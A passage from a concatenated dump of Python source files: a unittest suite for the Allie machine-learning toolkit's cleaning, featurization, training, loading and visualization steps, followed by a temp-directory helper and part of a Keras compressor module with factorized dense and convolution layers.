Typically augmentation strategies add 2x more data to the original
dataset.
'''
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copy(cur_dir+'/'+file, train_dir+'/'+directory+'/'+file)
os.chdir(augment_dir+'/'+directory)
os.system('python3 augment.py %s'%(train_dir+'/'+directory))
os.chdir(train_dir+'/'+directory)
# remove temp directory
listdir=os.listdir()
b=False
if len(listdir) > 1:
b=True
os.chdir(train_dir)
shutil.rmtree(train_dir+'/'+directory)
msg='failed augmentation, only one file exists in the directory'
return b, msg
def featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features):
'''
take in a file and output a featurized .JSON file using
Allie internal Feature API.
test.wav --> test.json, test.wav with features in test.json
'''
directory='%s_features'%(sampletype)
folder=train_dir+'/'+directory
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
# put test audio file in directory
shutil.copy(cur_dir+'/'+file, folder+'/'+file)
os.chdir(features_dir+'/%s_features/'%(sampletype))
features_list=default_features
for i in range(len(features_list)):
print('------------------------------')
print('FEATURIZING - %s'%(features_list[i].upper()))
print('------------------------------')
os.system('python3 featurize.py %s %s'%(folder, features_list[i]))
# now that we have the folder let's check if the array has all the features
os.chdir(folder)
gopen=open('test_%s.json'%(sampletype),'r')
g=json.load(gopen)
features=g['features'][sampletype]
gopen.close()
test_features=list(features)
if test_features == features_list:
b=True
else:
b=False
notcount=list()
for i in range(len(features_list)):
if features_list[i] not in test_features:
notcount.append(features_list[i])
msg=str(notcount) + ' failed during featurization'
return b, msg
def transcribe_file(train_dir, file, sampletype, default_transcript):
os.chdir(train_dir)
directory='%s_transcription'%(sampletype)
folder=train_dir+'/'+directory
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
# put test audio file in directory
shutil.copy(cur_dir+'/'+file, folder+'/'+file)
os.chdir(features_dir+'/%s_features/'%(sampletype))
os.system('python3 featurize.py %s'%(folder))
# now that we have the folder let's check if the array has all the features
os.chdir(folder)
g=json.load(open('test_%s.json'%(sampletype)))
transcripts=list(g['transcripts'][sampletype])
if default_transcript[0] in transcripts:
msg='success'
b=True
else:
msg='failure'
b=False
os.chdir(train_dir)
shutil.rmtree(directory)
return b, msg
def model_predict(filetype, testfile, loadmodel_dir, load_dir):
# copy machine learning model into image_model dir
os.chdir(cur_dir+'/helpers/models/%s_models/'%(filetype))
listdir=os.listdir()
temp=os.getcwd()
tempfiles=list()
os.chdir(loadmodel_dir)
if '%s_models'%(filetype) not in os.listdir():
os.mkdir('%s_models'%(filetype))
os.chdir(temp)
# copy audio machine learning model into directory (one_two)
tempfiles=list()
for i in range(len(listdir)):
try:
shutil.copytree(temp+'/'+listdir[i], loadmodel_dir+'/%s_models/'%(filetype)+listdir[i])
except:
pass
tempfiles.append(listdir[i])
# copy file in load_dir
shutil.copy(cur_dir+'/'+testfile, load_dir+'/'+testfile)
# copy machine learning models into proper models directory
os.chdir(cur_dir+'/helpers/models/%s_models/'%(filetype))
listdir=os.listdir()
# copy audio machine learning model into directory (one_two)
tempfiles=list()
for i in range(len(listdir)):
try:
shutil.copytree(temp+'/'+listdir[i], loadmodel_dir+'/%s_models/'%(filetype)+listdir[i])
except:
pass
tempfiles.append(listdir[i])
os.chdir(loadmodel_dir)
os.system('python3 load.py')
os.chdir(load_dir)
os.chdir(load_dir)
listdir=os.listdir()
b=False
for i in range(len(listdir)):
if filetype == 'audio':
if listdir[i].endswith('.wav') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'text':
if listdir[i].endswith('.txt') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'image':
if listdir[i].endswith('.png') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
elif filetype == 'video':
if listdir[i].endswith('.mp4') and listdir[i][0:-4]+'.json' in listdir:
b=True
break
# now remove all the temp files
os.chdir(loadmodel_dir+'/%s_models'%(filetype))
for i in range(len(tempfiles)):
shutil.rmtree(tempfiles[i])
msg = filetype + ' model prediction failed.'
return b, msg
###############################################################
## INITIALIZATION ##
###############################################################
# initialize variables for the test
cur_dir=os.getcwd()
prevdir= prev_dir(cur_dir)
load_dir = prevdir+'/load_dir'
train_dir = prevdir + '/train_dir'
model_dir = prevdir+ '/training'
features_dir=prevdir+'/features'
loadmodel_dir = prevdir+'/models'
clean_dir=prevdir+'/cleaning/'
augment_dir=prevdir+'/augmentation'
test_dir=prevdir+'/tests'
visualization_dir=prevdir+'/visualize'
preprocessing_dir=prevdir+'/preprocessing'
# settings
settings=json.load(open(prevdir+'/settings.json'))
clean_data=settings['clean_data']
augment_data=settings['augment_data']
# transcript settings
default_audio_transcript=settings['default_audio_transcriber']
default_image_transcript=settings['default_image_transcriber']
default_text_transcript=settings['default_text_transcriber']
default_video_transcript=settings['default_video_transcriber']
default_csv_transcript=settings['default_csv_transcriber']
transcribe_audio=settings['transcribe_audio']
transcribe_text=settings['transcribe_text']
transcribe_image=settings['transcribe_image']
transcribe_video=settings['transcribe_video']
transcribe_csv=settings['transcribe_csv']
# feature settings
default_audio_features=settings['default_audio_features']
default_text_features=settings['default_text_features']
default_image_features=settings['default_image_features']
default_video_features=settings['default_video_features']
default_csv_features=settings['default_csv_features']
# cleaning settings
default_audio_cleaners=settings['default_audio_cleaners']
default_text_cleaners=settings['default_text_cleaners']
default_image_cleaners=settings['default_image_cleaners']
default_video_cleaners=settings['default_video_cleaners']
default_csv_cleaners=settings['default_csv_cleaners']
# augmentation settings
default_audio_augmenters=settings['default_audio_augmenters']
default_text_augmenters=settings['default_text_augmenters']
default_image_augmenters=settings['default_image_augmenters']
default_video_augmenters=settings['default_video_augmenters']
default_csv_augmenters=settings['default_csv_augmenters']
# preprocessing settings
select_features=settings['select_features']
reduce_dimensions=settings['reduce_dimensions']
scale_features=settings['scale_features']
default_scaler=settings['default_scaler']
default_feature_selector=settings['default_feature_selector']
default_dimensionality_reducer=settings['default_dimensionality_reducer']
dimension_number=settings['dimension_number']
feature_number=settings['feature_number']
# other settings for raining scripts
training_scripts=settings['default_training_script']
model_compress=settings['model_compress']
# directories
audiodir=loadmodel_dir+'/audio_models'
textdir=loadmodel_dir+'/text_models'
imagedir=loadmodel_dir+'/image_models'
videodir=loadmodel_dir+'/video_models'
csvdir=loadmodel_dir+'/csv_models'
###############################################################
## UNIT TESTS ##
###############################################################
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_dependencies(unittest.TestCase):
'''
DEPENDENCY TESTS
Confirms that all the modules are installed correctly, along with
all brew install commands.
'''
#### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_sox(self):
# test brew installation by merging two test files
os.chdir(cur_dir)
os.system('sox test_audio.wav test_audio.wav test2.wav')
if 'test2.wav' in os.listdir():
b=True
else:
b=False
self.assertEqual(True, b)
def test_c_ffmpeg(self):
# test FFmpeg installation with test_audio file conversion
os.chdir(cur_dir)
if 'test_audio.mp3' in os.listdir():
os.remove('test_audio.mp3')
os.system('ffmpeg -i test_audio.wav test_audio.mp3 -y')
if 'test_audio.mp3' in os.listdir():
b=True
else:
b=False
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_cleaning(unittest.TestCase):
'''
CLEANING API TESTS
Tests file cleaning capabilities by removing duplicates, etc.
across all file types.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='audio_cleaning'
file='test_audio.wav'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_text_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='text_cleaning'
file='test_text.txt'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_image_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='image_cleaning'
file='test_image.png'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_video_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='video_cleaning'
file='test_video.mp4'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_csv_clean(self, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='csv_cleaning'
file='test_csv.csv'
b, msg = clean_file(directory, clean_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_augmentation(unittest.TestCase):
'''
AUGMENTATION API TESTS
Tests augmentation capabilities for all data types.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='audio_augmentation'
file='test_audio.wav'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_text_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='text_augmentation'
file='test_text.txt'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_image_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='image_augmentation'
file='test_image.png'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_video_augment(self, augment_dir=augment_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='video_augmentation'
file='test_video.mp4'
b, msg=augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
def test_csv_augment(self, augment_dir=augment_dir, clean_dir=clean_dir, train_dir=train_dir, cur_dir=cur_dir):
directory='csv_augmentation'
file='test_csv.csv'
b, msg = augment_file(directory, augment_dir, cur_dir, train_dir, file)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_features(unittest.TestCase):
'''
FEATURIZATION API TESTS
Tests featurization capabilities across all training scripts.
'''
#### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_audio_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_audio_features=default_audio_features):
file='test_audio.wav'
sampletype='audio'
default_features=default_audio_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_text_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_text_features=default_text_features):
file='test_text.txt'
sampletype='text'
default_features=default_text_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_image_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_image_features=default_image_features):
file='test_image.png'
sampletype='image'
default_features=default_image_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
def test_video_features(self, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir, default_video_features=default_video_features):
file='test_video.mp4'
sampletype='video'
default_features=default_video_features
b, msg = featurize_file(features_dir, cur_dir, train_dir, file, sampletype, default_features)
self.assertEqual(True, b, msg)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_transcription(unittest.TestCase):
'''
TRANSCRIPTION API TESTS
tests the ability to transcribe across many
data types
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
# change settings.json to test all model scripts
os.system('pip3 install opencv-python==3.4.2.16 opencv-contrib-python==3.4.2.16')
os.chdir(prevdir)
settings=json.load(open('settings.json'))
settings['transcribe_audio']=True
settings['transcribe_text']=True
settings['transcribe_image']=True
settings['transcribe_videos']=True
settings['transcribe_csv']=True
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, prevdir=prevdir, transcribe_audio=transcribe_audio, transcribe_text=transcribe_text, transcribe_image=transcribe_image, transcribe_video=transcribe_video, transcribe_csv=transcribe_csv):
# change settings.json back to normal to defaults
os.chdir(prevdir)
settings=json.load(open('settings.json'))
settings['transcribe_audio']=transcribe_audio
settings['transcribe_text']=transcribe_text
settings['transcribe_image']=transcribe_image
settings['transcribe_videos']=transcribe_video
settings['transcribe_csv']=transcribe_csv
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
# audio transcription
def test_audio_transcription(self, default_audio_transcript=default_audio_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_audio.wav'
sampletype='audio'
default_transcript=default_audio_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# text transcription
def test_text_transcription(self, default_text_transcript=default_text_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_text.txt'
sampletype='text'
default_transcript=default_text_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# image transcription
def test_image_transcription(self, default_image_transcript=default_image_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_image.png'
sampletype='image'
default_transcript=default_image_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
# video transcription
def test_video_transcription(self, default_video_transcript=default_video_transcript, features_dir=features_dir, train_dir=train_dir, cur_dir=cur_dir):
file='test_video.mp4'
sampletype='video'
default_transcript=default_video_transcript
b, msg = transcribe_file(train_dir, file, sampletype, default_transcript)
self.assertEqual(True, b, msg)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_training(unittest.TestCase):
'''
MODEL TRAINING API TESTS
Tests all available training scripts and compression abilities.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir, training_scripts=training_scripts):
# change settings.json to test all model scripts
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
settings['default_training_script']=training_scripts
settings["default_text_features"] = ["nltk_features"]
settings['select_features']=False
settings['scale_features']=False
settings['reduce_dimensions']=False
settings['remove_outliers']=True
settings['visualize_data']=False
settings['clean_data']=False
settings['augment_data']=False
settings['model_compress']=False
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, textdir=textdir, prevdir=prevdir, training_scripts=training_scripts, clean_data=clean_data, augment_data=augment_data, model_compress=model_compress):
# change settings.json back to normal to defaults
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
settings['default_training_script']=training_scripts
settings['clean_data']=clean_data
settings['augment_data']=augment_data
settings['model_compress']=model_compress
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_training(self, cur_dir=cur_dir, train_dir=train_dir, model_dir=model_dir, clean_data=clean_data, augment_data=augment_data, test_dir=test_dir):
# use text model for training arbitrarily because it's the fastest model training time.
# note that the files here are already featurized to only test modeling capability (and not featurization or other aspects of the Models API)
os.chdir(train_dir)
shutil.copytree(test_dir+'/helpers/model_test/one', os.getcwd()+'/one')
shutil.copytree(test_dir+'/helpers/model_test/two', os.getcwd()+'/two')
os.chdir(model_dir)
# iterate through all machine learning model training methods
os.system('python3 model.py text 2 c onetwo one two')
os.chdir(train_dir)
shutil.rmtree('one')
shutil.rmtree('two')
# now find the model
os.chdir(textdir)
listdir=os.listdir()
b=False
# remove temporary files in the textdir
for i in range(len(listdir)):
if listdir[i].find('onetwo') >= 0:
b=True
# use shutil to remove a folder.
shutil.rmtree(listdir[i])
break
else:
os.remove(listdir[i])
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_loading(unittest.TestCase):
'''
LOADING API TESTS
Note we have to do a loop here to end where the end is
'audio.json' | 'text.json' | 'image.json' | 'video.json' | 'csv.json'
this is because the files are renamed to not have conflicts.
For example, if 'audio.wav' --> 'audio.json' and 'audio.mp4' --> 'audio.json',
both would have a conflicting name and would overwrite each other.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
# change settings.json to test all model scripts
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['default_audio_features']=['librosa_features']
settings['default_text_features']=['nltk_features']
settings['default_image_features']=['image_features']
settings['default_video_features']=['video_features']
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, default_audio_features=default_audio_features, default_text_features=default_text_features, default_image_features=default_image_features, default_video_features=default_video_features, default_csv_features=default_csv_features):
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features back to what they were before.
settings['default_audio_features']=default_audio_features
settings['default_text_features']=default_text_features
settings['default_image_features']=default_image_features
settings['default_video_features']=default_video_features
settings['default_csv_features']=default_csv_features
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_loadaudio(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='audio'
testfile='test_audio.wav'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadtext(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='text'
testfile='test_text.txt'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadimage(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='image'
testfile='test_image.png'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
def test_loadvideo(self, load_dir=load_dir, cur_dir=cur_dir, loadmodel_dir=loadmodel_dir):
filetype='video'
testfile='test_video.mp4'
b, msg = model_predict(filetype, testfile, loadmodel_dir, load_dir)
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_preprocessing(unittest.TestCase):
'''
PREPROCESSING API TESTS
Tests Allie's preprocessing functionality to reduce dimensionality,
select features, and scale features.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def setUp(self, prevdir=prevdir):
# change settings.json to test all model scripts
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['select_features']=True
settings['reduce_dimensions']=True
settings['scale_features']=True
settings['default_scaler']=["standard_scaler"]
settings['default_feature_selector']=["rfe"]
settings['default_dimensionionality_reducer']=["pca"]
settings['dimension_number']=20
settings['feature_number']=2
jsonfile=open('settings.json', 'w')
json.dump(settings, jsonfile)
jsonfile.close()
def tearDown(self, prevdir=prevdir, select_features=select_features, reduce_dimensions=reduce_dimensions, scale_features=scale_features, default_scaler=default_scaler, default_feature_selector=default_feature_selector, default_dimensionality_reducer=default_dimensionality_reducer, dimension_number=dimension_number, feature_number=feature_number):
os.chdir(prevdir)
gopen=open('settings.json','r')
settings=json.load(gopen)
gopen.close()
# set features for the right ML models
settings['select_features']=select_features
settings['reduce_dimensions']=reduce_dimensions
settings['scale_features']=scale_features
settings['default_scaler']=default_scaler
settings['default_feature_selector']=default_feature_selector
settings['default_dimensionality_reducer']=default_dimensionality_reducer
settings['dimension_number']=dimension_number
settings['feature_number']=feature_number
jsonfile=open('settings.json','w')
json.dump(settings, jsonfile)
jsonfile.close()
def test_createtransformer(self, preprocessing_dir=preprocessing_dir, test_dir=test_dir):
# copy files into the train_dir
os.chdir(test_dir)
try:
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
except:
shutil.rmtree(train_dir+'/one')
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
try:
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
except:
shutil.rmtree(train_dir+'/two')
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
os.chdir(preprocessing_dir)
# call it using proper format
os.system('python3 transform.py text c onetwo one two')
# now that we have transformer test to see if it exists
if 'text_transformer' in os.listdir():
os.chdir('text_transformer')
listdir=os.listdir()
if 'c_onetwo_standard_scaler_pca_rfe.json' in listdir:
b=True
else:
b=False
else:
b=False
shutil.rmtree(train_dir+'/one')
shutil.rmtree(train_dir+'/two')
# feature select data
self.assertEqual(True, b)
def test_loadtransformer(self, test_dir=test_dir, preprocessing_dir=preprocessing_dir):
try:
shutil.copytree(test_dir+'/helpers/text_transformer', preprocessing_dir+'/text_transformer/')
except:
shutil.rmtree(preprocessing_dir+'/text_transformer/')
shutil.copytree(test_dir+'/helpers/text_transformer', preprocessing_dir+'/text_transformer/')
# now actually convert and load data with this transformer
os.chdir(preprocessing_dir+'/text_transformer/')
model=pickle.load(open('c_onetwo_standard_scaler_pca_rfe.pickle','rb'))
jsonfile=json.load(open('c_onetwo_standard_scaler_pca_rfe.json'))
sample=jsonfile['sample input X']
transformed_sample=jsonfile['sample transformed X']
newsize=model.transform(np.array(sample).reshape(1,-1))
# ---> FOR TESTING ONLY <----
# print(model)
# print(newsize)
# print(type(newsize))
# print(transformed_sample)
# print(type(transformed_sample))
if np.size(newsize[0]) == np.size(np.array(transformed_sample)):
b=True
else:
b=False
self.assertEqual(True, b)
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
class test_visualization(unittest.TestCase):
'''
VISUALIZATION API TESTS
Tests Allie's visualization API capabilities for classification problems.
'''
##### ##### ##### ##### ##### ##### ##### ##### ##### #####
def test_visualization(self, test_dir=test_dir, train_dir=train_dir, visualization_dir=visualization_dir):
# copy files into the train_dir
os.chdir(test_dir)
shutil.copytree(test_dir+'/helpers/model_test/one', train_dir+'/one')
shutil.copytree(test_dir+'/helpers/model_test/two', train_dir+'/two')
# now run the visualization
os.chdir(visualization_dir)
if 'visualization_session' in os.listdir():
shutil.rmtree('visualization_session')
os.system('python3 visualize.py text one two')
if 'visualization_session' in os.listdir():
os.chdir('visualization_session')
files=os.listdir()
if 'clustering' in files and 'feature_ranking' in files and 'model_selection' in files and 'classes.png' in files:
b=True
else:
b=False
else:
b=False
os.chdir(train_dir)
shutil.rmtree("one")
shutil.rmtree("two")
# visualize data (text data featurized)
self.assertEqual(True, b)
if __name__ == '__main__':
unittest.main()
```
#### File: helpers/autokaggle/utils.py
```python
import os
import tempfile
import string
import random
def ensure_dir(directory):
"""Create directory if it does not exist."""
if not os.path.exists(directory):
os.makedirs(directory)
def temp_path_generator():
sys_temp = tempfile.gettempdir()
path = os.path.join(sys_temp, 'autokaggle')
return path
def rand_temp_folder_generator():
"""Create and return a temporary directory with the path name '/temp_dir_name/autokeras' (E:g:- /tmp/autokeras)."""
chars = string.ascii_uppercase + string.digits
size = 6
random_suffix = ''.join(random.choice(chars) for _ in range(size))
sys_temp = temp_path_generator()
path = sys_temp + '_' + random_suffix
ensure_dir(path)
return path
```
#### File: keras_compressor/keras_compressor/layers.py
```python
from keras import backend as K
from keras import activations, constraints, initializers, regularizers
from keras.engine import InputSpec, Layer
from keras.layers import Dense
from keras.utils import conv_utils
class FactorizedDense(Layer):
"""Just your regular densely-connected NN layer.
This layer based on `keras.layers.core.Dense` and behave like it.
`FactorizedDense` implements the operation:
`output = activation(dot(dot(input, pre_kernel), post_kernel) + bias)`
where `activation` is the element-wise activation function
passed as the `activation` argument, `pre_kernel` and `post_kernel` is a weights matrix
created by the layer, and `bias` is a bias vector created by the layer
(only applicable if `use_bias` is `True`).
Note: if the input to the layer has a rank greater than 2, then
it is flattened prior to the initial dot product with `pre_kernel`.
# Arguments
units: Positive integer, dimensionality of the output space.
components: Positive integer or None, the size of internal components.
If given None, the output is calculated as the same manner as `Dense` layer.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
pre_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
post_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
pre_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
post_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
kernel_constraint: Constraint function applied to
the `kernel` weights matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
# Input shape
nD tensor with shape: `(batch_size, ..., input_dim)`.
The most common situation would be
a 2D input with shape `(batch_size, input_dim)`.
# Output shape
nD tensor with shape: `(batch_size, ..., units)`.
For instance, for a 2D input with shape `(batch_size, input_dim)`,
the output would have shape `(batch_size, units)`.
"""
target_layer_types = [Dense]
def __init__(self, units, components,
activation=None,
use_bias=True,
pre_kernel_initializer='glorot_uniform',
post_kernel_initializer='glorot_uniform',
bias_initializer='zeros',
pre_kernel_regularizer=None,
post_kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
pre_kernel_constraint=None,
post_kernel_constraint=None,
bias_constraint=None,
**kwargs):
if 'input_shape' not in kwargs and 'input_dim' in kwargs:
kwargs['input_shape'] = (kwargs.pop('input_dim'),)
super(FactorizedDense, self).__init__(**kwargs)
self.units = units
self.components = components
self.activation = activations.get(activation)
self.use_bias = use_bias
self.pre_kernel_initializer = initializers.get(pre_kernel_initializer)
self.post_kernel_initializer = initializers.get(post_kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.pre_kernel_regularizer = regularizers.get(pre_kernel_regularizer)
self.post_kernel_regularizer = regularizers.get(post_kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.pre_kernel_constraint = constraints.get(pre_kernel_constraint)
self.post_kernel_constraint = constraints.get(post_kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(min_ndim=2)
self.supports_masking = True
def build(self, input_shape):
assert len(input_shape) >= 2
input_dim = input_shape[-1]
is_factorized = self.components is not None
if is_factorized:
shape = (input_dim, self.components)
else:
shape = (input_dim, self.units)
self.pre_kernel = self.add_weight(shape,
initializer=self.pre_kernel_initializer,
name='pre_kernel',
regularizer=self.pre_kernel_regularizer,
constraint=self.pre_kernel_constraint)
if not is_factorized:
self.post_kernel = None
else:
self.post_kernel = self.add_weight((self.components, self.units),
initializer=self.post_kernel_initializer,
name='kernel',
regularizer=self.post_kernel_regularizer,
constraint=self.post_kernel_constraint)
if self.use_bias:
self.bias = self.add_weight((self.units,),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
self.input_spec = InputSpec(min_ndim=2, axes={-1: input_dim})
self.built = True
def call(self, inputs):
h = K.dot(inputs, self.pre_kernel)
if self.post_kernel is not None:
h = K.dot(h, self.post_kernel)
if self.use_bias:
h = K.bias_add(h, self.bias)
if self.activation is not None:
h = self.activation(h)
return h
def compute_output_shape(self, input_shape):
assert input_shape and len(input_shape) >= 2
assert input_shape[-1]
output_shape = list(input_shape)
output_shape[-1] = self.units
return tuple(output_shape)
def get_config(self):
config = {
'units': self.units,
'activation': activations.serialize(self.activation),
'components': self.components,
'use_bias': self.use_bias,
'pre_kernel_initializer': initializers.serialize(self.pre_kernel_initializer),
'post_kernel_initializer': initializers.serialize(self.post_kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'pre_kernel_regularizer': regularizers.serialize(self.pre_kernel_regularizer),
'post_kernel_regularizer': regularizers.serialize(self.post_kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'pre_kernel_constraint': constraints.serialize(self.pre_kernel_constraint),
'post_kernel_constraint': constraints.serialize(self.post_kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(FactorizedDense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class FactorizedConv2DTucker(Layer):
"""2D convolution layer with tucker decomposition.
This layer is based on `keras.layers.convolution.Conv2D` and behave like it.
The difference is the kernel is factorized by tucker decomposition.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
# Arguments
filters: Integer, the dimensionality of the output space
(i.e. the number output of filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
input_components: Integer or None, the number of components
of kernel for the input channel axis. If given None, the
factorization of input side is skipped.
output_components: Integer or None, the number of components
of kernel for the output channel axis. If given None, the
factorization of output side is skipped.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, width, height, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, width, height)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
